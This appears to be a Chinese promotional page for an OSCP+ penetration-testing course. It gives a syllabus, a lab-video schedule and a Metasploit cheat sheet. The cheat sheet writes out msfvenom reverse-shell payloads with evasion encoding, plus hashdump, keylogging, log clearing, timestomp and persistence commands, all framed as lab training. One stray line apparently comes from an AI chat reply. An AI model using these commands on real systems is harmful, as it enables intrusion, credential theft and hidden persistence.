# 🏷
#猫咪推荐OSCP考证 #OSCP考证 #OSCP #渗透测试 #红队 #蓝队 #信息收集 #被动信息收集 #主动信息收集 #whois #谷歌黑客 #GoogleDork #Shodan #Netcraft #开源情报 #OSINT #端口扫描 #端口枚举 #nmap #SYN扫描 #UDP扫描 #服务指纹 #版本探测 #生存主机探测 #漏洞扫描 #NSE #NmapScriptingEngine #漏洞库 #ExploitDB #SearchSploit #漏洞利用 #exp修改 #编译与调试 #缓冲区溢出 #ROP #二进制利用 #pwn #exp修补 #msf #Metasploit #msfconsole #msfvenom #载荷 #Meterpreter #非分段载荷 #分段载荷 #后渗透 #持久化 #免杀 #shellcode #编码混淆 #线程注入 #DLL注入 #PE文件免杀 #powershell免杀 #反病毒绕过 #文件免杀 #Web攻击 #Web渗透 #目录枚举 #gobuster #目录穿越 #LFI #RFI #文件包含 #文件上传漏洞 #文件解析器 #PHP包装器 #data_filter #php://filter #文件读取 #Wappalyzer #指纹识别 #BurpSuite #代理拦截 #请求篡改 #自动扫描 #手工验证 #SQL注入 #SQLi #基于报错注入 #联合查询注入 #盲注 #时间盲注 #sqlmap #自动注入 #XSS #跨站脚本 #CSRF #会话劫持 #身份验证绕过 #SSRF #反序列化 #命令执行 #RCE #Webshell #上传后门 #日志注入 #客户端攻击 #钓鱼攻击 #Office宏 #宏木马 #Word宏 #powershell载荷 #客户端指纹 #滥用Windows组件 #Library-ms #Shortcut #LNK攻击 #WebDAV #社会工程 #密码攻击 #密码喷洒 #密码爆破 #password spraying #hydra #johntheripper #hashcat #字典变异 #规则变异 #keepass #ssh私钥破解 #ssh2john #keepass2john #NTLM破解 #NTLM传递 #Net-NTLMv2 #NTLMRelay #Responder #Impacket #impacket #pth #PassTheHash #票据攻击 #Kerberos #Kerberoasting #AS-REP #票据伪造 #GoldenTicket #SilverTicket #DCSync #mimikatz #Rubeus #TGS #TGT #票据注入 #AD枚举 #ActiveDirectory #PowerView #BloodHound #SharpHound #LDAP枚举 #AD权限枚举 #SPN枚举 #服务主体名 #域控 #域渗透 #横向移动 #PsExec #WMI #WinRM #PsExec64 #wmiexec #wmic #hash传递 #票据传递 #DC攻击 #域持久化 #黄金票据 #白银票据 #Kerberos滥用 #AD横向 #AD持久化 #内网穿透 #端口转发 #socat #ssh隧道 #本地端口转发 #动态端口转发 #远程端口转发 #socks代理 #sshuttle #plink #plink.exe #Netsh #Windows端口转发 #隧道过DPI #HTTP隧道 #chisel #dnscat2 #DNS隧道 #HTTP隧道 #C2 #命令与控制 #反向连接 #绑定shell #反弹shell #nc #netcat #ncat #powershell反弹 #powercat #chisel代理 #代理chains #proxychains #内网侦察 #端口扫描内网 #路由添加 #socat代理链 #容器攻击 #Docker逃逸 #vuln_docker #容器安全 #日志与痕迹清理 #提权枚举 #linPEAS #winPEAS #PowerUp #自动化枚举 #本地提权 #Linux提权 #Windows提权 #SUID利用 #cron利用 #不安全文件权限 #sudo提权 #内核漏洞提权 #补丁与缓解 #免杀实践 #线程注入免杀 #msf生成payload #变种与混淆 #安全头检查 #SecurityHeaders #SSL测试 #SSLLabs #证书与TLS #工具链 #gitrob #gitleaks #SearchSploit #exploit-db #packetstorm #工具自动化 #脚本与复盘 #攻击链复现 #组合模拟攻击 #实战演练 #靶机训练 #VulnHub #CTF #红日靶场 #Kioptrix #Moria #TommyBoy #Skytower #pwnlab #练习笔记 #复盘报告 #渗透测试报告 #POA #应试策略 #OSCP准备 #考证冲刺
#### 官网地址:点我直达
<a href="https://fcmit.cc/" target="_blank" style="text-decoration: none; display: flex; align-items: center; justify-content: center; text-align: center;">
<img style="height: 8em; width: auto; margin-right: 10px; pointer-events: none; user-select: none;" src="https://fcmit.cc/lxkf3.png" referrerpolicy="no-referrer" alt="1.png">
</a>
# 🔍 课程介绍>>>
<p align="center">
<span style="
background: linear-gradient(to right, rgb(64,49,76) 0%, rgb(76,35,45) 100%);
color: white;
font-weight: bold;
padding: 6px 12px;
border-radius: 6px;
">
包含OSCP+培训 & msf专题课
</span>
</p>
---

---
<p align="center">
<a class="oscp-btn" href="https://mp.weixin.qq.com/s/R4r-tJd-T2ty2pMZMq8MeA" target="_blank" rel="noopener noreferrer" title="OSCP考证全攻略">
<span>OSCP考证全攻略点我直达</span>
</a>
</p>
<style>
/* 按钮基础样式 */
.oscp-btn {
text-decoration: none;
display: inline-block;
border-radius: 6px;
overflow: hidden;
box-shadow: 0 6px 18px rgba(0,0,0,0.18);
}
/* 内部 span 的外观与过渡 */
.oscp-btn span{
display: inline-block;
padding: 6px 12px;
color: #fff;
font-weight: bold;
background: linear-gradient(90deg, rgb(64,49,76) 0%, rgb(76,35,45) 100%);
transition: background 250ms ease, transform 200ms ease, color 200ms ease;
border-radius: 6px;
}
/* 悬停/聚焦态:改变渐变色并略微放大 */
.oscp-btn:hover span,
.oscp-btn:focus span{
background: linear-gradient(90deg, #9b59b6 0%, #e74c3c 100%); /* 悬停颜色 */
transform: translateY(-3px) scale(1.02);
color: #fff;
}
/* 为键盘导航提供可见的焦点样式(可访问性) */
.oscp-btn:focus{
outline: 3px solid rgba(155,89,182,0.18);
outline-offset: 4px;
border-radius: 8px;
}
/* 小屏幕时保证文本不换行导致溢出 */
@media (max-width:420px){
.oscp-btn span{ padding:8px 10px; white-space:nowrap; }
}
</style>
---
<p align="center">
<span style="
background: linear-gradient(to right, rgb(64,49,76) 0%, rgb(76,35,45) 100%);
color: white;
font-weight: bold;
padding: 6px 12px;
border-radius: 6px;
">
围绕OSCP+ 展开教学
</span>
</p>
---
泷羽 Sec 团队专注红队教学与 OSCP 培训,在 B 站免费提供从基础到内网渗透的课程,适合各类学习者。团队的泷老师是资深红队队长,持有 OSEP、CISSP、OSCP 等高含金量证书,教学有保障。
# 课程分析
是一个以**OSCP 实战与证书通过**为目标,兼顾红队实战技巧与攻防思维的系统化培训。课程由理论课件(20 章 PDF)+ 大量逐日/逐机实战视频(day1–day72 等靶机/专题)组成,形成“知识讲解 → 工具演示 → 靶机实操 → 复盘总结”的闭环训练体系。
- **覆盖范围**:从基础信息收集、端口/服务扫描、Web/SQL 注入、客户端攻击、密码学、到本地提权(Windows/Linux)、端口转发与隧道、免杀、Metasploit、Active Directory(AD)枚举与高级域攻击(Kerberoast、AS-REP、票据伪造、DCSync 等)、横向移动、持久化,以及综合靶机演练与考证策略。
- **实战资源**:视频目录包含大量 VulnHub、CTF、Tr0ll、Kioptrix、红日系列、Moria、TommyBoy、Skytower、pwnlab 等靶机,覆盖单机与域环境、应用漏洞与二进制漏洞、容器与特殊平台(Node)等真实场景。
- **教学逻辑**:讲解工具原理与命令(例如 nmap、gobuster、Burp、msf、mimikatz、BloodHound、socat、chisel、dnscat2、hashcat 等),再以视频靶机练习验证与巩固,最后通过“组合模拟攻击”训练完整攻防链路。
---
# 课程亮点(为什么值得学)
1. **体系齐全、衔接明确**:从入门到域渗透、从漏洞利用到免杀,课程覆盖 OSCP 考试和实战常见能力点。
2. **大量靶机练习**:视频库丰富,实战场景真实,便于把理论迅速落地。
3. **工具和命令详尽**:每章均有具体命令与工具用法示例,便于学员复制复现。
4. **重视提权与域攻防**:Windows/Linux 提权、AD 认证攻击与横向移动讲解详尽,是通过高级靶机与企业级模拟的关键能力。
5. **实战闭环训练**:第19/24章将技术串联为完整攻防流程,适合考试演练与项目实战。
---
# 课程说明(面向谁、学完能做什么、考证对接)
## 面向人群
- 想通过 **OSCP** 或提升渗透测试实战能力的学员。
- 有一定 Linux/网络基础,或愿意投入时间补基础的进阶学习者。
- 企业安全人员、红队/蓝队工程师、CTF 选手希望系统化提升实战技能者。
## 前置要求
- 熟悉 Linux 基本命令、Windows 基本管理操作。
- 对网络协议(TCP/IP、HTTP、DNS)有初步理解。
- 基本编程或脚本能力(bash、PowerShell、Python)有助于快速吸收。
## 学习目标(学完后你能)
- 独立完成一次单机靶机的完整渗透测试:信息收集 → 漏洞利用 → 本地提权 → 清理痕迹。
- 在有权限的企业 AD 环境中进行枚举、Kerberoast/AS-REP 等认证攻击、票据/传递/横向移动并可能获取域控(仅限授权实验室)。
- 使用常用渗透工具(nmap、Burp、sqlmap、msf、mimikatz、BloodHound、socat、chisel 等)并能根据现场情况灵活组合。
- 修改和调试 exploit、生成与混淆 payload(基础免杀)、在被防护环境下做端口转发与隧道穿透。
- 针对 OSCP 考试场景掌握应试策略(如实操习惯、复盘方法、时间与任务分配、工具限制下的手工技巧)。
## 与 OSCP 的对接
- 课程重点与 OSCP 常考点高度一致:手工漏洞利用、提权、内网横向、复盘报告写作等。
- 课程中的大量靶机视频(VulnHub、Kioptrix、Moria 等)非常适合 OSCP 的练习与模拟考试。
- 注意 OSCP 考试要求的道德与授权差异:考试环境只允许对授权靶场/练习机使用,不允许攻击真实无授权目标。
---
# 学习建议与学习路线(高效路径)
**第一月(基础夯实)**
- 学完:信息收集、漏洞扫描、Web 攻击简介、通用 Web 攻击、SQL 注入、客户端攻击(章节 1–6)。
- 实操:完成 Kioptrix、易级别 Web 靶机(day4、day25、day29 中的入门靶机)。
**第二月(漏洞利用与提权)**
- 学完:已知漏洞利用、exp 修补、免杀、密码攻击(章节 7–10)。
- 实操:中级 Web + 二进制靶机(Moria、TommyBoy、Skytower),开始练习手工写 exp 与改造 payload。
**第三月(本地提权与隧道)**
- 学完:Windows/Linux 提权、端口转发与 SSH 隧道(章节 11–13)。
- 实操:完成多个提权靶机与网络穿透演练(socat、sshuttle、plink 使用)。
**第四月(AD 与域渗透)**
- 学完:Metasploit、AD 枚举、认证攻击(章节 15–18)。
- 实操:做 DC 靶机(day9/day10),学习 BloodHound 数据收集与分析,Kerberoast 与 AS-REP 操作。
**第五月(综合演练与免杀/持久化)**
- 学完:AD 横向移动、隧道过 DPI、免杀与持久化(章节 14、19、23)。
- 实操:做“红日”系列与多网段综合靶机,复盘完整攻击链。
**第六月(考证冲刺)**
- 做课件中第19、24章的组合模拟攻击复现;系统整理笔记与报告;按 OSCP 考场模拟(限时、分配题目)练习。
同时**每周至少做 2-3 次靶机,写录屏或笔记复盘**,并保存 exploit/commands/snippets 以便考试时快速调用。
---
# 评估与考核(建议的课程评估方式)
- **章节测验**:每章后小测(选择/简答)检测理解。
- **靶机打卡**:每个视频对应靶机做实操并提交复盘报告(含命令、思路、提权点)。
- **中期项目**:一次模拟渗透测试报告(含 POA、利用链与缓解建议)。
- **终期(模拟 OSCP)**:限定时间做 3–5 台靶机并提交技术报告(评分参照 OSCP 标准)。
---
# 实验环境建议(搭建与资源)
- **本地/云 lab**:建议使用 VMware/VirtualBox + Kali、Windows Server/Workstation(可用 Vulnhub/AD lab 镜像)。
- **工具清单**:Kali(nmap、msf、sqlmap、gobuster、burp)、BloodHound + Neo4j、impacket、mimikatz(Windows lab)、hashcat、pwntools、chisel、dnscat2、socat。
- **版本管理**:记录每次实验使用工具版本与配置,便于复现与排错。
---
# day → 对应课件章节对照表(分析)
|Video day 名称(或关键字)|类型 / 主要测试点|对应课件章节(PDF 节)|
|---|--:|---|
|day4 — Kioptrix|Linux 服务枚举、漏洞利用、提权|1 信息收集、2 漏洞扫描、12 Linux 提权|
|day9 — 靶机 DC-6|AD 域靶机(域枚举→认证攻击→横向)|16 AD介绍与枚举、17 AD认证攻击、18 AD 横向移动|
|day10 — 靶机 DC-9|AD 域靶机(域内持久化/票据)|16、17、18(域渗透与持久化)|
|day13 — Tr0ll|Web 漏洞(LFI/RCE/文件包含)|3 Web 攻击简介、4 通用 Web 攻击、9 文件包含/目录穿越|
|day15 — Tr0ll2|Web 漏洞深挖|3、4、5 SQL 注入(若含注入)|
|day20 — Tr0ll3|综合 Web 渗透|3–5(Web、SQL、目录枚举)|
|day21 — pwnlab|二进制利用 / pwn(本地提权)|7 已知漏洞利用、8 exp修补、11 Windows 提权 / 12 Linux 提权|
|day25 — webdeveloper|Web 应用深度测试(Burp、目录枚举)|3 Web 攻击简介、4 通用 Web 攻击|
|day29 — zico2|综合靶机(枚举→利用→提权)|1–12(整体流程)|
|day33 — NullByte|综合复盘/工具链整合|全章(作为复盘连接各章)|
|day36 — Node|Node.js/服务端漏洞(依赖/逻辑)|3、4(Web 攻击 / 已知漏洞利用)|
|day38 — fristileaks-13|CTF / VulnHub 案例复现|3–7(依具体漏洞)|
|day41 — 红日4 / 红日5|红队式靶场(企业级攻防链路)|16–18、23(AD 枚举/认证/横向/持久化)|
|day42 — vuln_docker|容器安全 / Docker 漏洞|7 已知漏洞利用、11/12 提权(容器逃逸相关)|
|day50 — Moria1.1|中级综合靶机|1–12(枚举→利用→提权)|
|day56 — SolidState|中高级单机|7、8、11、12(exp修改与提权)|
|day59 — VulnHub2018_DeRPnStiNK|VulnHub 综合练习|1–12(全流程)|
|day61 — Temple_Of_Doom|高难度单机靶机|7、8、11、12(二进制/提权)|
|day62 — pwnos1.0|pwn / 二进制利用|7 已知漏洞利用、8 exp修补|
|day64 — Skytower|中高级靶机(服务/提权)|1–12(综合)|
|day66 — Misdirection|复杂漏洞链(混合 web/bin)|3–8(Web + exp 修改)|
|day70 — GlasgowSmile|高难度靶机 / 综合|1–24(综合演练)|
|TommyBoy|Web/服务漏洞(常见 VulnHub)|3–7(Web、exp)|
|SickOS|综合/OS 内核或服务|7、11、12(漏洞利用、提权)|
|election|Web / 应用逻辑漏洞|3、4(Web 攻击)|
|tiki|Web CMS 漏洞|3、4(Web 攻击、插件利用)|
|hackme1|入门或中级靶机|1–6(信息收集→漏洞利用)|
|zico 系列(其它编号)|多为综合练机|1–12(视具体实例)|
|pwn 系列 / pwnlab 变体|二进制漏洞(缓冲区、ROP)|7、8(exp 修改、编译、调试)|
|redteam / 红日 系列(整体)|企业级红队演练(钓鱼→内网→域控)|6 客户端攻击、11/12 提权、16–23 AD 渗透与持久化|
|vuln_docker / docker 相关视频|容器漏洞与转移|7、11、12(容器逃逸 / 内网横向)|
|pwnos / pwnos1.0 等|pwn 实战|7、8(二进制)|
|NullByte / 复盘类|技术整合与复盘|汇总各章(用于连接知识点)|
|webdeveloper / wordpress 类|WP 插件漏洞、文件泄露、git 泄密|3、4、5(Web、SQL、文件包含)|
|bloodhound / AD 集中演示视频|BloodHound 数据采集与分析|16 AD介绍与枚举、18 AD 横向移动|
|dc 系列(任意 DC 靶机)|域控攻防(拿票据/横向)|17 AD认证攻击、18 AD 横向移动、23 持久化|
|chisel / 隧道相关视频|HTTP/DPI 绕过、隧道建立|13 端口转发与 SSH 隧道、14 隧道过 DPI(chisel/dnscat2)|
|metasploit 专题视频|MSF 使用、payload 管理、后渗透|15 Metasploit 框架、20 后渗透与自动化|
|红日 + DC 组合模拟|完整攻防链路(应试/实战)|19 组合模拟攻击、24 教材小结(实战闭环)|
---
# 使用说明与建议(如何用这张对照表高效练习)
1. **按章学习 → 找对应 day 跟练**:学完某章后,优先在表中找到与之对应的 day 视频并做复现。
2. **做练习要写复盘**:每看完一个 day,写下:枚举命令、利用链、提权点、遇到的坑及解决办法。把关键命令整理成 snippet。
3. **按难度分批练**:先完成入门 day(Kioptrix、TommyBoy、webdeveloper),再做中级(Moria、Skytower),最后攻克红日 / DC 系列。
4. **结合第19/24章做完整攻防复现**:把散落技巧串成链路,模拟从初始访问到域控的完整流程。
5. **若想导出为可打印对照表或 CSV**,我可以把上表转换成可下载的格式(你告诉我需要 CSV 还是 Excel,我直接生成表格内容供你复制)。
---
# ☁️ 网盘目录(仅展示部分目录)>>>
### OSCP+




### msf专题课(当前页面最下面介绍msf专题课内容)

## 📚🛠️ 课件工具展示
### 笔记资料

### 按天补充资料
==就不一一姐截图了哦==

### 靶场文件

### 红日靶场文件

### 补充资料

## msf专题课分析
MSF 专题是整门课程中**“自动化利用与后渗透/会话管理”**的核心模块,侧重于:**生成/定制载荷、使用 msfconsole 发起利用、管理 Meterpreter 会话、进行内网端口转发与 pivot、调用 post 模块做信息收集/持久化与清理**——是把“入侵口”变成“内网控制与资源访问”的关键技术集合。
---
### 二、14 个 MSF 文件的高层归类与要点(按内容分组)
1. **msf(1) — MSF 基础与环境配置**
- msfdb 初始化、PostgreSQL 与 msf 的集成(`sudo msfdb init`、`systemctl enable postgresql`);
- workspace 管理、db_nmap 将扫描结果写入数据库;
- `hosts`、`services`、`vulns` 的查询与使用。
2. **msf(2) — 模块与用法(auxiliary / exploit / post)**
- 搜索模块 (`search type:auxiliary ssh` / `search Apache 2.4.49`);
- `use`、`show options`、`set`/`unset` 参数、`run` 执行;
- 模块参数管理与结果收集(creds、jobs)。
3. **msf(3) — msfvenom 与载荷生成**
- 列出载荷 `msfvenom -l payloads`、生成 exe/ps1/psh/elf 等格式;
- 分段(staged) vs 非分段(nonstaged)载荷概念,何时用 multi/handler。
4. **msf(4) — multi/handler 与监听**
- 使用 `use exploit/multi/handler`、设置 payload、set LHOST/LPORT、`run -j` 后台;
- 会话管理(`sessions -l`、`sessions -i <id>`、`sessions -k`、Ctrl+Z + y 放后台)。
5. **msf(5) — Meterpreter 文件操作**
- `ls`/`pwd`/`cd`/`download`/`upload`/`edit`/`search`/`show_mount` 等文件操作命令示例;
- 用例:下载 `/etc/passwd`、上传本地脚本到目标等。
6. **msf(6) — Meterpreter 系统命令与提权尝试**
- `getuid`、`getpid`、`getsid`、`getprivs`、`getsystem`(及 `getsystem -t` 各技术选项);
- 进程迁移 `migrate <pid>`、执行命令 `execute`、`shell`、`clearev`、`hashdump`(post 模块)。
7. **msf(7) — Meterpreter 网络命令与端口转发**
- `ifconfig`/`ipconfig`/`netstat`/`arp`/`route`/`resolve`;
- `portfwd add -l <local> -p <rport> -r <rhost>` 用于内网穿透与访问内网服务;`portfwd list`。
8. **msf(8) — Meterpreter UI/键盘/屏幕监控等交互命令**
- `screenshot`、`screenshare`、`keyscan_start`/`keyscan_dump`/`keyscan_stop`、`keyboard_send`、`mouse`;
- `enumdesktops`、`getdesktop` 等桌面相关命令。
9. **msf(9) — Post-Exploitation 模块使用(信息收集/持久化)**
- `run post/windows/gather/hashdump`、`run post/windows/manage/` 等;
- 持久化(注册表/计划任务/服务)与横向的脚本化支持。
10. **msf(10) — Meterpreter 文件功能继续(示例演示)**
- 常用文件命令的更详细演示:`edit`、`checksum`、`mkdir`、`search -f` 等实际用法示范。
11. **msf(11) — Meterpreter 系统操作(扩展)与常见提权脚本**
- `ps`、`pgrep`、`pkill`、`reboot`、`shutdown`、`reg`(远程注册表);
- 示例:`msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -f exe -o payload.exe`。
12. **msf(12) — portfwd 深入(案例与注意事项)**
- portfwd 的实际演示(例如将目标 8080 转发到 Kali 的 80),权限与检测风险说明;
- 会话依赖性(session 关闭后转发失效)、防火墙/IDS 探测风险。
13. **msf(13) — UI/其他交互操作(补充)**
- 继续 `keyscan`、`screenshare`、`uictl`(锁鼠标键盘),以及 timestomp 等时间戳伪装演示。
14. **msf(14) — 高级使用与整合(通常包含路由/pivot/自动化)**
- 设置 `route add`(将内网段与 session 绑定以便 msf modules 扫描); 使用 `run post/multi/manage/autoroute` 或手工 `route add`;
- socks / proxy 设置,结合 `auxiliary/server/socks4a` 或 meterpreter 的 `socks` 功能(如有)来做动态代理;
- 工作流中如何把 msf 与其它工具(nmap、gobuster、proxychains)结合以实现内网探测。
---
### 三、关键命令与模块速查(便于考试/上机时快速检索)
把常用命令按场景归纳,直接复制粘贴可用:
##### msf 环境与数据库
- `sudo msfdb init`
- `sudo systemctl enable postgresql`
- `msfconsole`
- `workspace -a <name>` / `workspace <name>`
- `db_nmap -A 192.168.50.202`
- `hosts` / `services` / `vulns`
##### 搜索与使用模块
- `search type:auxiliary ssh`
- `use exploit/windows/smb/psexec`
- `show options` / `set RHOSTS 192.168.50.202` / `set PAYLOAD windows/x64/meterpreter_reverse_tcp` / `set LHOST 192.168.119.4` / `run`
##### msfvenom 载荷生成
- 列表:`msfvenom -l payloads --platform windows --arch x64`
- 生成 exe:`msfvenom -p windows/x64/meterpreter_reverse_tcp LHOST=192.168.119.4 LPORT=443 -f exe -o met.exe`
- 编码/混淆:`-e x86/shikata_ga_nai -b "\x00"` 等
##### multi/handler 与监听
- `use exploit/multi/handler`
- `set payload windows/x64/meterpreter_reverse_tcp`
- `set LHOST 192.168.119.4` `set LPORT 443`
- `set ExitOnSession false` / `run -j` / `jobs` / `sessions -l` / `sessions -i <id>`
##### Meterpreter 常用(会话内)
- 文件:`ls` `pwd` `cd` `download <file>` `upload <file>` `edit <file>` `search -f *.txt`
- 系统:`getuid` `getpid` `getprivs` `getsystem -t 0` `migrate <pid>` `shell` `execute -f cmd` `clearev` `hashdump`
- 网络:`ifconfig`/`ipconfig` `netstat` `arp` `route` `portfwd add -l 1234 -p 80 -r 10.0.0.5` `portfwd list`
- UI:`screenshot` `screenshare` `keyscan_start` `keyscan_dump` `keyscan_stop` `keyboard_send "whoami"`
- 进程:`ps` `pgrep powershell` `pkill <name>`
- 其他:`getproxy` `resolve baidu.com` `show_mount`
##### 路由 / Pivot / Proxy
- 在 msf 控制台:`route add 172.16.5.0 255.255.255.0 <session-id>`(或简写)
- 用 meterpreter 做 portfwd 或用 `auxiliary/server/socks4a` 建立 socks 代理后配合 proxychains 使用
##### 后渗透 / post 模块
- `run post/windows/gather/hashdump`(需要 system)
- `run post/multi/manage/autoroute` / `run post/windows/manage/`(持久化/收集)
- `use post/windows/gather/credentials/` 等
---
### 四、实践练习清单(按能力从易到难,含具体任务/命令与验证标准)
每项练习尽量在授权靶场(本地 lab 或 VulnHub)完成并写复盘。
##### 入门(1 周)
1. 安装并初始化 msfdb,创建 workspace;用 `db_nmap` 导入 nmap 结果并查看 `hosts/services`。
2. 用 `msfvenom` 生成简单的 reverse exe:
`msfvenom -p windows/meterpreter/reverse_tcp LHOST=<你的IP> LPORT=4444 -f exe -o shell.exe`
用 multi/handler 接收 `use exploit/multi/handler` -> set payload -> run,确认能得到 session。
3. 在得到 session 后运行 `sysinfo` / `getuid` / `pwd` 验证会话正常。
##### 会话管理与文件操作(1 周)
1. 在 session 内执行文件下载:`download /etc/passwd`。验证本地是否保存。
2. 使用 `upload` 将本地工具放到目标并执行(`execute -f` 或 `shell`)。
3. 练习 `migrate <pid>`:在高权限进程间迁移后再 `getsystem`。
##### 内网穿透与 pivot(1 周)
1. 使用 meterpreter 的 `portfwd` 将目标内网数据库端口映射到本地,再用本地客户端连接测试:
`portfwd add -l 2345 -p 5432 -r 10.4.50.215`,本地 `psql -h 127.0.0.1 -p 2345 -U postgres`。
2. 在 msf 控制台学会 `route add` 并用 `auxiliary/scanner/portscan/tcp` 扫描内网段,通过 session 进行内网侦察。
3. 建立 socks 代理(若 lab 支持)并用 `proxychains` 访问内网 Web 管理页面。
##### 后渗透与持久化(1 周)
1. 运行 `run post/windows/gather/hashdump`(或等效 post 模块)收集 hash(需 system)。
2. 用 `keyscan_start` / `keyscan_dump` 做键盘记录演示(在授权 lab)。
3. 实现一种简单持久化:上传并建立计划任务或修改注册表(以 lab 环境为准),并验证在重启/回连后持久化是否触发。
##### 综合演练(持续)
- 做 3 台不同类型靶机:单机 Web → 得到 user → 本地提权为 root/sys → 在内网做 pivot → 访问内网 DB → 用 post 模块导出证据并写渗透报告。
---
### 五、与课程其它章节的衔接(如何把 MSF 用到课程各章)
- **信息收集 / 漏洞扫描(章1–2)**:`db_nmap` 将扫描结果导入 msfdb,便于后续模块快速筛选目标。
- **漏洞利用(章7)**:将 searchsploit 找到的 exploit 对应为 msf 模块或用 msfvenom 生成 payload;若为 web exp,可在 msf 中使用 exploit/http/* 模块。
- **免杀(章9)**:在 msfvenom 生成载荷后,结合免杀技巧(编码、变量混淆、脚本封装)进行测试。
- **隧道与端口转发(章13–14)**:meterpreter 的 `portfwd` 与 msf 的 route/pivot 能直接完成内网穿透与代理功能。
- **AD/域渗透(章16–23)**:msf 可作为获取初始 shell 后的后渗透工具,用于横向扫描、运行 post 模块、上传 SharpHound 等工具并下载采集结果。
- **组合模拟攻击(章19/24)**:MSF 常用于“初始访问→稳定会话→内网侦察→横向移动→持久化”这一链路中,是连接各章节操作的核心工具。
---
### 六、优势、局限与考试/实战注意事项
##### 优势
- **效率高**:msf 能自动化 payload 生成、监听及大量 post 操作。
- **功能丰富**:meterpreter 提供文件/进程/网络/UI/持久化几乎全覆盖。
- **易集成**:可和 nmap、proxychains、bloodhound 等工具联用,构建快速攻防链路。
##### 局限与风险
- **可检测性高**:在真实靶场或生产环境,默认 payload 常被 AV/EDR、IDS 检测;需结合免杀策略。
- **会话依赖性**:很多转发/route 仅在会话存活时有效;session 断开后需要重新建立。
- **考试策略**(OSCP):OSCP 对自动化工具的使用有规则(你已在课程里标注),考试时应优先用手工方法,msf 用法需按考场允许情况使用。
---
### 七、4 周 MSF 密集练习计划(每日 1.5–3 小时)
**第1周:环境与基础**
- 日1:安装与 msfdb、workspace 使用、db_nmap。
- 日2:msf 模块搜索、auxiliary 与 exploit 基本流程。
- 日3:msfvenom 载荷生成(多格式)、staged vs nonstaged 理解。
- 日4:multi/handler 监听、sessions 管理。
- 日5:复盘小练:生成 payload,上机连接,写一页复盘。
**第2周:Meterpreter 深入**
- 日1:文件与目录操作(download/upload/edit/search)练习。
- 日2:系统命令(getuid/getsystem/migrate/clearev)练习与提权尝试。
- 日3:网络命令(ifconfig/route/portfwd)与内网访问实战。
- 日4:UI 操作(screenshot/keyscan)与证据采集。
- 日5:综合小练:拿到 shell → 上传工具 → 迁移进程 → 导出敏感文件。
**第3周:Pivot / Post / 持久化**
- 日1:route add / autoroute 使用 + 内网端口扫描。
- 日2:建立 socks 代理、proxychains 测试内网服务。
- 日3:运行 post 模块收集 credentials/hash。
- 日4:实现并验证一种持久化(计划任务或注册表)。
- 日5:安全清理(清日志、清进程、移除持久化)并写完整复盘。
**第4周:综合演练与考证准备**
- 日1–3:完整攻防链路演练(枚举→利用→meterpreter→pivot→post→持久化→清理)。
- 日4:针对 OSCP 模拟一次限时练习(按考试规则,尽量少用或有策略地使用 msf)。
- 日5:整理 cheat-sheet(常用命令/模块/复盘模板)。
---